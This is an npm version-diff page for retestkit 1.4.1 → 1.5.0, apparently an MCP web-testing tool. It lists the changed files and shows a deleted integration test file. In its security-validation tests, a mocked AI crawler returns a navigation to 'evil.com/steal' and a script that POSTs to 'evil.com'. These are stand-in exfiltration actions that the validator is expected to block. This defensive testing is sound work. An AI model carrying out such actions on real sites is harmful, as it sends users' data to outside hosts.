npm - retestkit - Versions diffs - 1.4.1 → 1.5.0 - Mend

retestkit 1.4.1 → 1.5.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (238) hide show

package/README.md +59 -40
package/dist/config.js +8 -8
package/dist/config.js.map +1 -1
package/dist/logger.js +1 -1
package/dist/logger.js.map +1 -1
package/dist/prompts/index.d.ts +1 -1
package/dist/prompts/index.d.ts.map +1 -1
package/dist/prompts/index.js +21 -21
package/dist/prompts/index.js.map +1 -1
package/dist/prompts/templates/mcp/retest-crawl.md +7 -0
package/{src/prompts/templates/mcp/webtest-discover-flows.md → dist/prompts/templates/mcp/retest-discover-flows.md} +1 -1
package/{src/prompts/templates/mcp/webtest-discover.md → dist/prompts/templates/mcp/retest-discover.md} +2 -2
package/dist/prompts/templates/mcp/retest-full-workflow.md +12 -0
package/{src/prompts/templates/mcp/webtest-generate-tests.md → dist/prompts/templates/mcp/retest-generate-tests.md} +1 -1
package/{src/prompts/templates/mcp/webtest-run-test.md → dist/prompts/templates/mcp/retest-run-test.md} +1 -1
package/{src/prompts/templates/mcp/webtest-start.md → dist/prompts/templates/mcp/retest-start.md} +1 -1
package/{src → dist}/prompts/templates/sampling/system-prefix.md +1 -1
package/dist/resources/index.js +7 -7
package/dist/resources/index.js.map +1 -1
package/dist/schemas/config.js +2 -2
package/dist/schemas/config.js.map +1 -1
package/dist/security/index.js +1 -1
package/dist/security/index.js.map +1 -1
package/dist/server.js +3 -3
package/dist/server.js.map +1 -1
package/dist/test-utils/mock-context.js +22 -22
package/dist/test-utils/mock-context.js.map +1 -1
package/dist/tools/index.d.ts +1 -1
package/dist/tools/index.d.ts.map +1 -1
package/dist/tools/index.js +5 -5
package/dist/tools/index.js.map +1 -1
package/dist/tools/retest/crawl.d.ts.map +1 -0
package/dist/tools/{webtest → retest}/crawl.js +7 -7
package/dist/tools/retest/crawl.js.map +1 -0
package/dist/tools/retest/discover-features.d.ts.map +1 -0
package/dist/tools/{webtest → retest}/discover-features.js +6 -6
package/dist/tools/retest/discover-features.js.map +1 -0
package/dist/tools/retest/discover-flows.d.ts.map +1 -0
package/dist/tools/{webtest → retest}/discover-flows.js +6 -6
package/dist/tools/retest/discover-flows.js.map +1 -0
package/dist/tools/retest/generate-tests.d.ts.map +1 -0
package/dist/tools/{webtest → retest}/generate-tests.js +5 -5
package/dist/tools/retest/generate-tests.js.map +1 -0
package/dist/tools/retest/index.d.ts.map +1 -0
package/dist/tools/retest/index.js.map +1 -0
package/dist/tools/retest/run-test-case.d.ts.map +1 -0
package/dist/tools/{webtest → retest}/run-test-case.js +3 -3
package/dist/tools/retest/run-test-case.js.map +1 -0
package/dist/tools/retest/schemas.d.ts.map +1 -0
package/dist/tools/retest/schemas.js.map +1 -0
package/dist/tools/retest/start-analysis.d.ts.map +1 -0
package/dist/tools/{webtest → retest}/start-analysis.js +5 -5
package/dist/tools/retest/start-analysis.js.map +1 -0
package/dist/workspace/index.js +8 -8
package/dist/workspace/index.js.map +1 -1
package/dist/workspace/types.d.ts +2 -2
package/dist/workspace/types.d.ts.map +1 -1
package/package.json +6 -2
package/.claude/commands/openspec/apply.md +0 -23
package/.claude/commands/openspec/archive.md +0 -27
package/.claude/commands/openspec/proposal.md +0 -28
package/.gemini/commands/openspec/apply.toml +0 -21
package/.gemini/commands/openspec/archive.toml +0 -25
package/.gemini/commands/openspec/proposal.toml +0 -26
package/.github/prompts/openspec-apply.prompt.md +0 -22
package/.github/prompts/openspec-archive.prompt.md +0 -26
package/.github/prompts/openspec-proposal.prompt.md +0 -27
package/.github/workflows/release.yml +0 -33
package/.kilocode/workflows/openspec-apply.md +0 -17
package/.kilocode/workflows/openspec-archive.md +0 -21
package/.kilocode/workflows/openspec-proposal.md +0 -22
package/.mcp.json +0 -23
package/.opencode/command/openspec-apply.md +0 -25
package/.opencode/command/openspec-archive.md +0 -28
package/.opencode/command/openspec-proposal.md +0 -30
package/.roo/commands/openspec-apply.md +0 -20
package/.roo/commands/openspec-archive.md +0 -24
package/.roo/commands/openspec-proposal.md +0 -25
package/.vscode/mcp.json +0 -23
package/AGENTS.md +0 -18
package/CLAUDE.md +0 -18
package/dist/tools/webtest/crawl.d.ts.map +0 -1
package/dist/tools/webtest/crawl.js.map +0 -1
package/dist/tools/webtest/discover-features.d.ts.map +0 -1
package/dist/tools/webtest/discover-features.js.map +0 -1
package/dist/tools/webtest/discover-flows.d.ts.map +0 -1
package/dist/tools/webtest/discover-flows.js.map +0 -1
package/dist/tools/webtest/generate-tests.d.ts.map +0 -1
package/dist/tools/webtest/generate-tests.js.map +0 -1
package/dist/tools/webtest/index.d.ts.map +0 -1
package/dist/tools/webtest/index.js.map +0 -1
package/dist/tools/webtest/run-test-case.d.ts.map +0 -1
package/dist/tools/webtest/run-test-case.js.map +0 -1
package/dist/tools/webtest/schemas.d.ts.map +0 -1
package/dist/tools/webtest/schemas.js.map +0 -1
package/dist/tools/webtest/start-analysis.d.ts.map +0 -1
package/dist/tools/webtest/start-analysis.js.map +0 -1
package/openspec/AGENTS.md +0 -456
package/openspec/changes/archive/2025-12-18-add-hybrid-artifact-paths/proposal.md +0 -33
package/openspec/changes/archive/2025-12-18-add-hybrid-artifact-paths/specs/webtest-resources/spec.md +0 -27
package/openspec/changes/archive/2025-12-18-add-hybrid-artifact-paths/specs/webtest-tools/spec.md +0 -304
package/openspec/changes/archive/2025-12-18-add-hybrid-artifact-paths/tasks.md +0 -43
package/openspec/changes/archive/2025-12-18-add-mcp-server-foundation/design.md +0 -209
package/openspec/changes/archive/2025-12-18-add-mcp-server-foundation/proposal.md +0 -41
package/openspec/changes/archive/2025-12-18-add-mcp-server-foundation/specs/mcp-server-core/spec.md +0 -183
package/openspec/changes/archive/2025-12-18-add-mcp-server-foundation/tasks.md +0 -112
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/design.md +0 -333
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/proposal.md +0 -66
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/specs/mcp-server-core/spec.md +0 -129
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/specs/webtest-lifecycle/spec.md +0 -138
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/specs/webtest-logging/spec.md +0 -211
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/specs/webtest-prompts/spec.md +0 -157
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/specs/webtest-resources/spec.md +0 -213
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/specs/webtest-sampling/spec.md +0 -257
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/specs/webtest-tools/spec.md +0 -501
package/openspec/changes/archive/2025-12-18-add-webtest-orchestrator/tasks.md +0 -264
package/openspec/changes/archive/2025-12-18-allow-analysis-of-incomplete-crawls/proposal.md +0 -24
package/openspec/changes/archive/2025-12-18-allow-analysis-of-incomplete-crawls/specs/webtest-tools/spec.md +0 -80
package/openspec/changes/archive/2025-12-18-allow-analysis-of-incomplete-crawls/tasks.md +0 -8
package/openspec/changes/archive/2025-12-18-fix-crawl-loop-stability/design.md +0 -90
package/openspec/changes/archive/2025-12-18-fix-crawl-loop-stability/proposal.md +0 -28
package/openspec/changes/archive/2025-12-18-fix-crawl-loop-stability/specs/webtest-sampling/spec.md +0 -90
package/openspec/changes/archive/2025-12-18-fix-crawl-loop-stability/tasks.md +0 -33
package/openspec/changes/archive/2025-12-18-use-markdown-artifacts/design.md +0 -558
package/openspec/changes/archive/2025-12-18-use-markdown-artifacts/proposal.md +0 -119
package/openspec/changes/archive/2025-12-18-use-markdown-artifacts/specs/webtest-resources/spec.md +0 -109
package/openspec/changes/archive/2025-12-18-use-markdown-artifacts/specs/webtest-tools/spec.md +0 -121
package/openspec/changes/archive/2025-12-18-use-markdown-artifacts/tasks.md +0 -133
package/openspec/changes/extract-prompts-to-markdown/design.md +0 -86
package/openspec/changes/extract-prompts-to-markdown/proposal.md +0 -50
package/openspec/changes/extract-prompts-to-markdown/specs/webtest-prompts/spec.md +0 -74
package/openspec/changes/extract-prompts-to-markdown/tasks.md +0 -40
package/openspec/changes/refactor-webtest-naming/design.md +0 -95
package/openspec/changes/refactor-webtest-naming/proposal.md +0 -66
package/openspec/changes/refactor-webtest-naming/specs/webtest-prompts/spec.md +0 -79
package/openspec/changes/refactor-webtest-naming/specs/webtest-resources/spec.md +0 -80
package/openspec/changes/refactor-webtest-naming/specs/webtest-sampling/spec.md +0 -122
package/openspec/changes/refactor-webtest-naming/specs/webtest-tools/spec.md +0 -113
package/openspec/changes/refactor-webtest-naming/tasks.md +0 -119
package/openspec/changes/rename-package-to-retest/proposal.md +0 -52
package/openspec/changes/rename-package-to-retest/specs/mcp-server-core/spec.md +0 -53
package/openspec/changes/rename-package-to-retest/specs/retest-lifecycle/spec.md +0 -68
package/openspec/changes/rename-package-to-retest/specs/retest-logging/spec.md +0 -35
package/openspec/changes/rename-package-to-retest/specs/retest-prompts/spec.md +0 -159
package/openspec/changes/rename-package-to-retest/specs/retest-resources/spec.md +0 -251
package/openspec/changes/rename-package-to-retest/specs/retest-sampling/spec.md +0 -99
package/openspec/changes/rename-package-to-retest/specs/retest-tools/spec.md +0 -295
package/openspec/changes/rename-package-to-retest/tasks.md +0 -71
package/openspec/project.md +0 -31
package/openspec/specs/mcp-server-core/spec.md +0 -178
package/openspec/specs/webtest-lifecycle/spec.md +0 -136
package/openspec/specs/webtest-logging/spec.md +0 -209
package/openspec/specs/webtest-prompts/spec.md +0 -155
package/openspec/specs/webtest-resources/spec.md +0 -248
package/openspec/specs/webtest-sampling/spec.md +0 -344
package/openspec/specs/webtest-tools/spec.md +0 -282
package/release.config.js +0 -9
package/src/config.test.ts +0 -96
package/src/config.ts +0 -32
package/src/elicitation/index.test.ts +0 -399
package/src/elicitation/index.ts +0 -171
package/src/elicitation/types.ts +0 -68
package/src/index.ts +0 -83
package/src/lifecycle/index.test.ts +0 -260
package/src/lifecycle/index.ts +0 -101
package/src/logger.redaction.test.ts +0 -322
package/src/logger.test.ts +0 -123
package/src/logger.ts +0 -229
package/src/playwright-client/index.ts +0 -392
package/src/playwright-client/types.ts +0 -99
package/src/progress/index.test.ts +0 -327
package/src/progress/index.ts +0 -170
package/src/progress/types.ts +0 -25
package/src/prompts/index.test.ts +0 -451
package/src/prompts/index.ts +0 -246
package/src/prompts/loader.test.ts +0 -100
package/src/prompts/loader.ts +0 -59
package/src/prompts/templates/mcp/webtest-crawl.md +0 -7
package/src/prompts/templates/mcp/webtest-full-workflow.md +0 -12
package/src/resources/index.ts +0 -250
package/src/resources/subscriptions.ts +0 -37
package/src/sampling/index.test.ts +0 -414
package/src/sampling/index.ts +0 -286
package/src/sampling/prompts.ts +0 -194
package/src/sampling/types.ts +0 -60
package/src/schemas/config.ts +0 -39
package/src/security/index.test.ts +0 -441
package/src/security/index.ts +0 -361
package/src/security/security-scenarios.test.ts +0 -468
package/src/server.ts +0 -211
package/src/test-utils/index.ts +0 -6
package/src/test-utils/mock-context.ts +0 -426
package/src/test-utils/mock-playwright-client.ts +0 -422
package/src/tools/index.ts +0 -11
package/src/tools/webtest/crawl.test.ts +0 -834
package/src/tools/webtest/crawl.ts +0 -901
package/src/tools/webtest/discover-features.ts +0 -412
package/src/tools/webtest/discover-flows.ts +0 -408
package/src/tools/webtest/generate-tests.test.ts +0 -532
package/src/tools/webtest/generate-tests.ts +0 -425
package/src/tools/webtest/index.ts +0 -7
package/src/tools/webtest/integration.test.ts +0 -536
package/src/tools/webtest/run-test-case.test.ts +0 -659
package/src/tools/webtest/run-test-case.ts +0 -508
package/src/tools/webtest/schemas.ts +0 -201
package/src/tools/webtest/start-analysis.test.ts +0 -151
package/src/tools/webtest/start-analysis.ts +0 -158
package/src/transports/http.ts +0 -19
package/src/transports/index.ts +0 -30
package/src/transports/stdio.ts +0 -7
package/src/types/capabilities.test.ts +0 -193
package/src/types/capabilities.ts +0 -50
package/src/types/context.ts +0 -21
package/src/types/tool.ts +0 -11
package/src/workspace/index.ts +0 -945
package/src/workspace/markdown.ts +0 -272
package/src/workspace/types.ts +0 -186
package/tests/integration/server.test.ts +0 -89
package/tests/integration/tools.test.ts +0 -99
package/tsconfig.json +0 -20
package/vitest.config.ts +0 -9
package/vitest.integration.config.ts +0 -10
/package/{src → dist}/prompts/templates/sampling/crawl-action.md +0 -0
/package/{src → dist}/prompts/templates/sampling/feature-discovery.md +0 -0
/package/{src → dist}/prompts/templates/sampling/flow-discovery.md +0 -0
/package/{src → dist}/prompts/templates/sampling/page-content-wrapper.md +0 -0
/package/{src → dist}/prompts/templates/sampling/test-evaluation.md +0 -0
/package/{src → dist}/prompts/templates/sampling/test-generation.md +0 -0
/package/dist/tools/{webtest → retest}/crawl.d.ts +0 -0
/package/dist/tools/{webtest → retest}/discover-features.d.ts +0 -0
/package/dist/tools/{webtest → retest}/discover-flows.d.ts +0 -0
/package/dist/tools/{webtest → retest}/generate-tests.d.ts +0 -0
/package/dist/tools/{webtest → retest}/index.d.ts +0 -0
/package/dist/tools/{webtest → retest}/index.js +0 -0
/package/dist/tools/{webtest → retest}/run-test-case.d.ts +0 -0
/package/dist/tools/{webtest → retest}/schemas.d.ts +0 -0
/package/dist/tools/{webtest → retest}/schemas.js +0 -0
/package/dist/tools/{webtest → retest}/start-analysis.d.ts +0 -0

package/src/tools/webtest/integration.test.ts DELETED Viewed

@@ -1,536 +0,0 @@
-/**
- * Integration Tests for Webtest Tools
- *
- * Tests for:
- * - 10.2: Full workflow (start → crawl → analyze → generate → run)
- * - 10.3: Cancellation mid-crawl
- * - 10.4: Fallback mode without sampling
- * - 10.5: Elicitation triggers
- * - 10.6: Resource listChanged notifications
- * - 10.7: Crawl resume from checkpoint
- * - 10.8: Loop detection triggers
- */
-import { describe, it, expect, vi, beforeEach } from "vitest";
-import {
-  createMockContext,
-  createMockPage,
-  createEcommerceMock,
-  type MockContext,
-} from "../../test-utils/index.js";
-import { createStartAnalysisTool } from "./start-analysis.js";
-import { createCrawlTool } from "./crawl.js";
-describe("Webtest Integration Tests", () => {
-  let context: MockContext;
-  beforeEach(() => {
-    context = createMockContext();
-  });
-  describe("10.3: Cancellation mid-crawl", () => {
-    it("handles cancellation gracefully", async () => {
-      // Set up a crawl that will be cancelled
-      const startTool = createStartAnalysisTool(() => context as any);
-      const crawlTool = createCrawlTool(() => context as any);
-      // Start analysis
-      const startResult = await startTool.handler({
-        url: "https://shop.example.com",
-      });
-      expect(startResult.isError).toBeFalsy();
-      const analysis = JSON.parse(startResult.content[0].text!);
-      // Set up context with sampling that simulates multi-step crawl
-      let stepCount = 0;
-      context.samplingClient.createMessage = vi.fn().mockImplementation(async () => {
-        stepCount++;
-        // Cancel after 2 steps
-        if (stepCount === 2) {
-          context.cancellationRegistry.cancel(`crawl-${analysis.analysisId}-${Date.now()}`);
-        }
-        return {
-          success: true,
-          data: {
-            actions: [{ tool: "click", args: { selector: "a.link" } }],
-            reasoning: "Exploring",
-            goalProgress: "Making progress",
-            goalComplete: false,
-          },
-        };
-      });
-      // The cancellation won't trigger in this mock since we can't predict requestId
-      // But we can test that the registry works
-      const requestId = "test-cancel-id";
-      context.cancellationRegistry.register(requestId);
-      context.cancellationRegistry.cancel(requestId);
-      expect(context.cancellationRegistry.isCancelled(requestId)).toBe(true);
-    });
-  });
-  describe("10.4: Fallback mode without sampling", () => {
-    it("returns prompt resource when sampling unavailable", async () => {
-      // Disable sampling
-      context.samplingClient.hasSampling = vi.fn().mockReturnValue(false);
-      const startTool = createStartAnalysisTool(() => context as any);
-      const crawlTool = createCrawlTool(() => context as any);
-      // Start analysis
-      const startResult = await startTool.handler({
-        url: "https://shop.example.com",
-      });
-      const analysis = JSON.parse(startResult.content[0].text!);
-      // Connect playwright and navigate
-      await context.playwrightClient.connect();
-      // Crawl should return fallback mode
-      const crawlResult = await crawlTool.handler({
-        analysisId: analysis.analysisId,
-        goal: "Explore the site",
-      });
-      expect(crawlResult.isError).toBeFalsy();
-      const crawlResponse = JSON.parse(crawlResult.content[0].text!);
-      expect(crawlResponse.needsManualInput).toBe(true);
-      expect(crawlResponse.prompt).toBeDefined();
-      expect(crawlResponse.instructions).toContain("manualNextActions");
-    });
-    it("accepts manualNextActions to continue crawl", async () => {
-      context.samplingClient.hasSampling = vi.fn().mockReturnValue(false);
-      const startTool = createStartAnalysisTool(() => context as any);
-      const crawlTool = createCrawlTool(() => context as any);
-      // Start analysis
-      const startResult = await startTool.handler({
-        url: "https://shop.example.com",
-      });
-      const analysis = JSON.parse(startResult.content[0].text!);
-      // Connect playwright
-      await context.playwrightClient.connect();
-      // First call should return fallback mode
-      const firstResult = await crawlTool.handler({
-        analysisId: analysis.analysisId,
-        goal: "Explore the site",
-      });
-      const firstResponse = JSON.parse(firstResult.content[0].text!);
-      expect(firstResponse.needsManualInput).toBe(true);
-      // Second call with manual actions should execute them
-      // Note: In real scenario, this would continue from checkpoint
-    });
-  });
-  describe("10.5: Elicitation triggers", () => {
-    it("creates cookie consent elicitation request", () => {
-      const request = context.elicitationClient.createCookieConsentRequest(
-        "GDPR banner detected"
-      );
-      expect(context.elicitationClient.createCookieConsentRequest).toHaveBeenCalled();
-    });
-    it("creates modal blocking elicitation request", () => {
-      const request = context.elicitationClient.createModalBlockingRequest(
-        "Newsletter signup modal"
-      );
-      expect(context.elicitationClient.createModalBlockingRequest).toHaveBeenCalled();
-    });
-    it("creates auth required elicitation request", () => {
-      const request = context.elicitationClient.createAuthRequiredRequest();
-      expect(context.elicitationClient.createAuthRequiredRequest).toHaveBeenCalled();
-    });
-    it("creates ambiguous navigation elicitation request", () => {
-      const options = [
-        { url: "/products", label: "Products" },
-        { url: "/services", label: "Services" },
-      ];
-      const request = context.elicitationClient.createAmbiguousNavigationRequest(options);
-      expect(context.elicitationClient.createAmbiguousNavigationRequest).toHaveBeenCalled();
-    });
-  });
-  describe("10.6: Resource listChanged notifications", () => {
-    it("notifies on workspace creation", async () => {
-      const startTool = createStartAnalysisTool(() => context as any);
-      await startTool.handler({
-        url: "https://example.com",
-      });
-      expect(context.resourceManager.notifyListChanged).toHaveBeenCalled();
-    });
-    it("notifies on crawl creation", async () => {
-      const startTool = createStartAnalysisTool(() => context as any);
-      const crawlTool = createCrawlTool(() => context as any);
-      // Set up to complete immediately
-      context.samplingClient.createMessage = vi.fn().mockResolvedValue({
-        success: true,
-        data: {
-          actions: [],
-          reasoning: "Goal achieved",
-          goalProgress: "Complete",
-          goalComplete: true,
-        },
-      });
-      const startResult = await startTool.handler({
-        url: "https://shop.example.com",
-      });
-      const analysis = JSON.parse(startResult.content[0].text!);
-      // Connect playwright
-      await context.playwrightClient.connect();
-      // Clear previous calls
-      vi.clearAllMocks();
-      await crawlTool.handler({
-        analysisId: analysis.analysisId,
-        goal: "Quick test",
-      });
-      // Should notify multiple times (on crawl create, page save, etc.)
-      expect(context.resourceManager.notifyListChanged).toHaveBeenCalled();
-    });
-  });
-  describe("10.7: Crawl resume from checkpoint", () => {
-    it("supports resume flag in crawl input", async () => {
-      const startTool = createStartAnalysisTool(() => context as any);
-      const crawlTool = createCrawlTool(() => context as any);
-      // Set up to complete immediately
-      context.samplingClient.createMessage = vi.fn().mockResolvedValue({
-        success: true,
-        data: {
-          actions: [],
-          reasoning: "Goal achieved",
-          goalProgress: "Complete",
-          goalComplete: true,
-        },
-      });
-      const startResult = await startTool.handler({
-        url: "https://shop.example.com",
-      });
-      const analysis = JSON.parse(startResult.content[0].text!);
-      await context.playwrightClient.connect();
-      // First crawl
-      await crawlTool.handler({
-        analysisId: analysis.analysisId,
-        goal: "Explore",
-        resume: false,
-      });
-      // Second crawl with resume
-      const resumeResult = await crawlTool.handler({
-        analysisId: analysis.analysisId,
-        goal: "Continue exploring",
-        resume: true, // This flag enables checkpoint loading
-      });
-      expect(resumeResult.isError).toBeFalsy();
-    });
-    it("loads checkpoint when resume is true", async () => {
-      // Mock checkpoint loading
-      const mockCheckpoint = {
-        step: 5,
-        timestamp: new Date().toISOString(),
-        visitedUrls: ["https://shop.example.com", "https://shop.example.com/products"],
-        currentUrl: "https://shop.example.com/products",
-        goalProgress: "Found products page",
-        canResume: true,
-      };
-      context.workspaceManager.loadCheckpoint = vi.fn().mockResolvedValue(mockCheckpoint);
-      const startTool = createStartAnalysisTool(() => context as any);
-      const crawlTool = createCrawlTool(() => context as any);
-      context.samplingClient.createMessage = vi.fn().mockResolvedValue({
-        success: true,
-        data: {
-          actions: [],
-          reasoning: "Goal achieved",
-          goalProgress: "Complete",
-          goalComplete: true,
-        },
-      });
-      const startResult = await startTool.handler({
-        url: "https://shop.example.com",
-      });
-      const analysis = JSON.parse(startResult.content[0].text!);
-      await context.playwrightClient.connect();
-      // Crawl with resume
-      await crawlTool.handler({
-        analysisId: analysis.analysisId,
-        goal: "Continue exploring",
-        resume: true,
-      });
-      // Checkpoint load should have been called
-      expect(context.workspaceManager.loadCheckpoint).toHaveBeenCalled();
-    });
-  });
-  describe("10.8: Loop detection triggers", () => {
-    it("detects URL cycle after multiple visits", async () => {
-      const startTool = createStartAnalysisTool(() => context as any);
-      const crawlTool = createCrawlTool(() => context as any);
-      // Set up sampling to keep returning same URL navigation
-      let callCount = 0;
-      context.samplingClient.createMessage = vi.fn().mockImplementation(async () => {
-        callCount++;
-        if (callCount >= 5) {
-          // End after 5 iterations
-          return {
-            success: true,
-            data: {
-              actions: [],
-              reasoning: "Loop detected",
-              goalProgress: "Stuck",
-              goalComplete: true,
-            },
-          };
-        }
-        return {
-          success: true,
-          data: {
-            actions: [{ tool: "navigate", args: { url: "https://shop.example.com" } }],
-            reasoning: "Navigating",
-            goalProgress: "Exploring",
-            goalComplete: false,
-          },
-        };
-      });
-      const startResult = await startTool.handler({
-        url: "https://shop.example.com",
-      });
-      const analysis = JSON.parse(startResult.content[0].text!);
-      await context.playwrightClient.connect();
-      const crawlResult = await crawlTool.handler({
-        analysisId: analysis.analysisId,
-        goal: "Explore",
-        limits: { maxSteps: 10 },
-      });
-      // Crawl should complete (either by goal or budget)
-      expect(crawlResult.isError).toBeFalsy();
-    });
-    it("blocks repeated identical actions", async () => {
-      const startTool = createStartAnalysisTool(() => context as any);
-      const crawlTool = createCrawlTool(() => context as any);
-      // Set up sampling to return the same action repeatedly
-      let callCount = 0;
-      context.samplingClient.createMessage = vi.fn().mockImplementation(async () => {
-        callCount++;
-        if (callCount >= 5) {
-          return {
-            success: true,
-            data: {
-              actions: [],
-              reasoning: "Done",
-              goalProgress: "Complete",
-              goalComplete: true,
-            },
-          };
-        }
-        // Return same action every time
-        return {
-          success: true,
-          data: {
-            actions: [{ tool: "click", args: { selector: "button.submit" } }],
-            reasoning: "Clicking button",
-            goalProgress: "Trying",
-            goalComplete: false,
-          },
-        };
-      });
-      const startResult = await startTool.handler({
-        url: "https://shop.example.com",
-      });
-      const analysis = JSON.parse(startResult.content[0].text!);
-      await context.playwrightClient.connect();
-      const crawlResult = await crawlTool.handler({
-        analysisId: analysis.analysisId,
-        goal: "Explore",
-        limits: { maxSteps: 10 },
-      });
-      // Crawl should complete without error
-      // The loop detection should log warnings but continue
-      expect(crawlResult.isError).toBeFalsy();
-    });
-  });
-  describe("Security Validation in Crawl", () => {
-    it("blocks navigation to disallowed domains", async () => {
-      const startTool = createStartAnalysisTool(() => context as any);
-      const crawlTool = createCrawlTool(() => context as any);
-      // Set up security validator to reject external domains
-      context.securityValidator.validateAction = vi.fn().mockImplementation((action) => {
-        if (action.tool === "navigate" && action.args.url?.includes("evil.com")) {
-          return { valid: false, reason: "External domain not allowed" };
-        }
-        return { valid: true };
-      });
-      // Sampling returns navigation to disallowed domain
-      context.samplingClient.createMessage = vi.fn().mockResolvedValueOnce({
-        success: true,
-        data: {
-          actions: [{ tool: "navigate", args: { url: "https://evil.com/steal" } }],
-          reasoning: "Found external link",
-          goalProgress: "Exploring",
-          goalComplete: false,
-        },
-      }).mockResolvedValueOnce({
-        success: true,
-        data: {
-          actions: [],
-          reasoning: "Done",
-          goalProgress: "Complete",
-          goalComplete: true,
-        },
-      });
-      const startResult = await startTool.handler({
-        url: "https://shop.example.com",
-      });
-      const analysis = JSON.parse(startResult.content[0].text!);
-      await context.playwrightClient.connect();
-      const crawlResult = await crawlTool.handler({
-        analysisId: analysis.analysisId,
-        goal: "Explore",
-      });
-      // Crawl should complete but the external navigation should have been blocked
-      expect(context.securityValidator.validateAction).toHaveBeenCalled();
-    });
-    it("blocks data exfiltration attempts", async () => {
-      const startTool = createStartAnalysisTool(() => context as any);
-      const crawlTool = createCrawlTool(() => context as any);
-      // Set up exfiltration detection
-      context.securityValidator.detectExfiltrationAttempt = vi.fn().mockReturnValue({
-        detected: true,
-        type: "external_post",
-        evidence: "POST to external server",
-      });
-      // Sampling returns evaluate with POST
-      context.samplingClient.createMessage = vi.fn().mockResolvedValueOnce({
-        success: true,
-        data: {
-          actions: [{
-            tool: "evaluate",
-            args: { script: "fetch('https://evil.com', {method:'POST'})" },
-          }],
-          reasoning: "Running script",
-          goalProgress: "Testing",
-          goalComplete: false,
-        },
-      }).mockResolvedValueOnce({
-        success: true,
-        data: {
-          actions: [],
-          reasoning: "Done",
-          goalProgress: "Complete",
-          goalComplete: true,
-        },
-      });
-      const startResult = await startTool.handler({
-        url: "https://shop.example.com",
-      });
-      const analysis = JSON.parse(startResult.content[0].text!);
-      await context.playwrightClient.connect();
-      const crawlResult = await crawlTool.handler({
-        analysisId: analysis.analysisId,
-        goal: "Explore",
-      });
-      // Exfiltration should have been detected
-      expect(context.securityValidator.detectExfiltrationAttempt).toHaveBeenCalled();
-    });
-  });
-  describe("Progress Reporting", () => {
-    it("emits progress during crawl", async () => {
-      const startTool = createStartAnalysisTool(() => context as any);
-      const crawlTool = createCrawlTool(() => context as any);
-      let stepCount = 0;
-      context.samplingClient.createMessage = vi.fn().mockImplementation(async () => {
-        stepCount++;
-        if (stepCount >= 3) {
-          return {
-            success: true,
-            data: {
-              actions: [],
-              reasoning: "Done",
-              goalProgress: "Complete",
-              goalComplete: true,
-            },
-          };
-        }
-        return {
-          success: true,
-          data: {
-            actions: [{ tool: "click", args: { selector: "a" } }],
-            reasoning: "Exploring",
-            goalProgress: `Step ${stepCount}`,
-            goalComplete: false,
-          },
-        };
-      });
-      const startResult = await startTool.handler({
-        url: "https://shop.example.com",
-      });
-      const analysis = JSON.parse(startResult.content[0].text!);
-      await context.playwrightClient.connect();
-      await crawlTool.handler({
-        analysisId: analysis.analysisId,
-        goal: "Explore",
-      });
-      // Progress should have been emitted
-      expect(context.progressEmitter.emit).toHaveBeenCalled();
-    });
-  });
-});